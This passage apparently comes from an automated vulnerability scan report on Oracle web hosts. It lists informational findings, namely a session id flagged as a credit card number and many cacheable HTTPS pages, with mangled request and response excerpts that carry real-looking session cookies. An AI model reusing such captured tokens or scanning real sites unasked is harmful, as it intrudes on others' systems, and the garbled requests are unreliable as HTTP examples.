Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
14.1. https://cloud.oracle.com/mycloud/f
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/f
Issue detail
The following credit card number was disclosed in the response:
Request
GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service:home:0:::::;q=0.3%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/...[SNIP]... 4454627354458997 " id="pInstance" />...[SNIP]... _image_generator.get_image?p_position=1&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]... _image_generator.get_image?p_position=2&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]... _image_generator.get_image?p_position=3&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]... _image_generator.get_image?p_position=4&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]...
14.2. https://cloud.oracle.com/mycloud/wwv_flow.accept
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The following credit card number was disclosed in the response:
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names...[SNIP]...
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/...[SNIP]... 4454627354458997 " id="pInstance" />...[SNIP]... _image_generator.get_image?p_position=1&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]... _image_generator.get_image?p_position=2&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]... _image_generator.get_image?p_position=3&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]... _image_generator.get_image?p_position=4&p_sessionid=4454627354458997 " height="60", width="40"/>...[SNIP]...
15. Cacheable HTTPS response
previous
next
There are 61 instances of this issue:
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
15.1. https://campus.oracle.com/campus/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/
Request
GET /campus/ HTTP/1.1/campus/;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/html4/loose.dtd">/1999/xhtml">...[SNIP]...
15.2. https://campus.oracle.com/campus/HR/apac-subscribe.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/apac-subscribe.html
Request
GET /campus/HR/apac-subscribe.html HTTP/1.1/campus/HR/apac-subscribe.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.3. https://campus.oracle.com/campus/HR/apac_internship.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/apac_internship.html
Request
GET /campus/HR/apac_internship.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.4. https://campus.oracle.com/campus/HR/aus_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/aus_main.html
Request
GET /campus/HR/aus_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.5. https://campus.oracle.com/campus/HR/cn_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/cn_main.html
Request
GET /campus/HR/cn_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.6. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/emea-apply%20now.jsp
Request
GET /campus/HR/emea-apply%20now.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_current-openings.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus-1252/html4/loose.dtd">...[SNIP]...
15.7. https://campus.oracle.com/campus/HR/emea-internship.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/emea-internship.html
Request
GET /campus/HR/emea-internship.html HTTP/1.1/campus/HR/emea-internship.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; _csoot=1318854354624; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dfunctiononclick%252528event%252529%25257Binternship%252528%252529%25257D%2526oidt%253D2%2526ot%253DDIV%26oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.8. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/emea1-jobs-remove1.jsp
Request
GET /campus/HR/emea1-jobs-remove1.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/emea-apply%20now.jsp;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus-1252/html4/loose.dtd">...[SNIP]...
15.9. https://campus.oracle.com/campus/HR/emea_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/emea_main.html
Request
GET /campus/HR/emea_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.10. https://campus.oracle.com/campus/HR/global_aboutus.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_aboutus.html
Request
GET /campus/HR/global_aboutus.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.11. https://campus.oracle.com/campus/HR/global_current-openings.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_current-openings.html
Request
GET /campus/HR/global_current-openings.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.12. https://campus.oracle.com/campus/HR/global_history.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_history.html
Request
GET /campus/HR/global_history.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.13. https://campus.oracle.com/campus/HR/global_home.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_home.html
Request
GET /campus/HR/global_home.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.14. https://campus.oracle.com/campus/HR/global_internship.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_internship.html
Request
GET /campus/HR/global_internship.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON; _csoot=1318854354624
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.15. https://campus.oracle.com/campus/HR/global_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_main.html
Request
GET /campus/HR/global_main.html HTTP/1.1/campus/HR/global_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.16. https://campus.oracle.com/campus/HR/global_main_about.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_main_about.html
Request
GET /campus/HR/global_main_about.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/zealand_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.17. https://campus.oracle.com/campus/HR/global_scope.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_scope.html
Request
GET /campus/HR/global_scope.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.18. https://campus.oracle.com/campus/HR/global_vision.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_vision.html
Request
GET /campus/HR/global_vision.html HTTP/1.1/campus/HR/global_vision.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; _csoot=1318854354624; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dfunctiononclick%252528event%252529%25257Bvision%252528%252529%25257D%2526oidt%253D2%2526ot%253DDIV%26oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.19. https://campus.oracle.com/campus/HR/global_why.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/global_why.html
Request
GET /campus/HR/global_why.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.20. https://campus.oracle.com/campus/HR/hk_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/hk_main.html
Request
GET /campus/HR/hk_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.21. https://campus.oracle.com/campus/HR/india_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/india_main.html
Request
GET /campus/HR/india_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.22. https://campus.oracle.com/campus/HR/indo_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/indo_main.html
Request
GET /campus/HR/indo_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
15.23. https://campus.oracle.com/campus/HR/instructions.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/instructions.html
Request
